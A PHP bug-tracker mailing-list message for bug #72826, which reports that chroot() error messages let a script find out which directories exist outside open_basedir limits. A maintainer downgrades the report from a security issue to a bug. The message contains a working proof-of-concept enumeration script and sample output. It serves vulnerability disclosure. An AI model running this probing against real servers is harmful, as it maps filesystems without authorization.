Sec Bug->Bug #72826 [Opn]: open_basedir bypass via enumerating error msg returned by chroot()

From: Date: Mon, 12 Jul 2021 15:40:16 +0000
Subject: Sec Bug->Bug #72826 [Opn]: open_basedir bypass via enumerating error msg returned by chroot()
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-234982@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=72826&edit=1 ID: 72826 Updated by: cmb@php.net Reported by: zero_420_ at yahoo dot com Summary: open_basedir bypass via enumerating error msg returned by chroot() Status: Open -Type: Security +Type: Bug Package: Safe Mode/open_basedir Operating System: ubuntu PHP Version: 5.5.38 Block user comment: N Private report: Y New Comment: open_basedir bypasses are not considered to be security issues; cf. <https://externals.io/message/105606> and <https://externals.io/message/115406>. Previous Comments: ------------------------------------------------------------------------ [2021-05-20 12:41:35] cmb@php.net > chroot seems to be missing a call to > PG(open_basedir)/php_check_open_basedir_ex Indeed. I don't see why this would qualify as security issue, though, since the exploit would require that an attacker can run arbitrary scripts, in which case all bets are off. That would not be a sec issue according to our classification[1]. I'll leave that for someone with a better background on POSIX to decide. [1] <https://wiki.php.net/security#not_a_security_issue> ------------------------------------------------------------------------ [2016-08-13 08:42:04] zero_420_ at yahoo dot com Description: ------------ in the process of testing i believe i have discovered a possible security issue/information disclosure error message returned by chroot() enables enumeration of directories regardless of open_basedir settings chroot(): Operation not permitted (errno 1) ==> directory exists chroot(): No such file or directory (errno 2) ==> directory !exists Test script: --------------- <?php ini_set('open_basedir', getcwd()); printf("basedir: %s\n", ini_get('open_basedir')); $dirlist = array(); $found = array(); for ($n = 0; $n < 9000; $n++) { $uid = @posix_getpwuid($n); if (!empty($uid)) { @array_push($dirlist, $uid['dir']); } } foreach ($dirlist as $path) { $err['message']=''; @chroot($path); $err = error_get_last(); if(strpos($err['message'],'(errno 1)')!==false){ array_push($found, $path); } } foreach (array_unique($found) as $dir) { printf("found directory: %s\n", $dir); } Expected result: ---------------- with a security setting like open_basedir enforced it should not be possible to disclose information about the structure of the underlying filesystem beyond the directory specified by the open_basedir directive. ive provided a small proof of concept to demonstrate how this can be used to map out the directory structure chroot seems to be missing a call to PG(open_basedir)/php_check_open_basedir_ex Actual result: -------------- (drop@logic:/tmp)$ php --version PHP 5.5.9-1ubuntu4.19 (cli) (built: Jul 28 2016 19:31:33) (drop@logic:/tmp)$ php -a Interactive mode enabled php > ini_set('open_basedir', getcwd()); php > printf("basedir: %s\n", ini_get('open_basedir')); basedir: /tmp php > @chroot('/'); php > print_r(error_get_last()); Array ( [type] => 2 [message] => chroot(): Operation not permitted (errno 1) [file] => php shell code [line] => 1 ) php > @chroot('/lol'); php > print_r(error_get_last()); Array ( [type] => 2 [message] => chroot(): No such file or directory (errno 2) [file] => php shell code [line] => 1 ) php > ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=72826&edit=1

« previous php.bugs (#234982) next »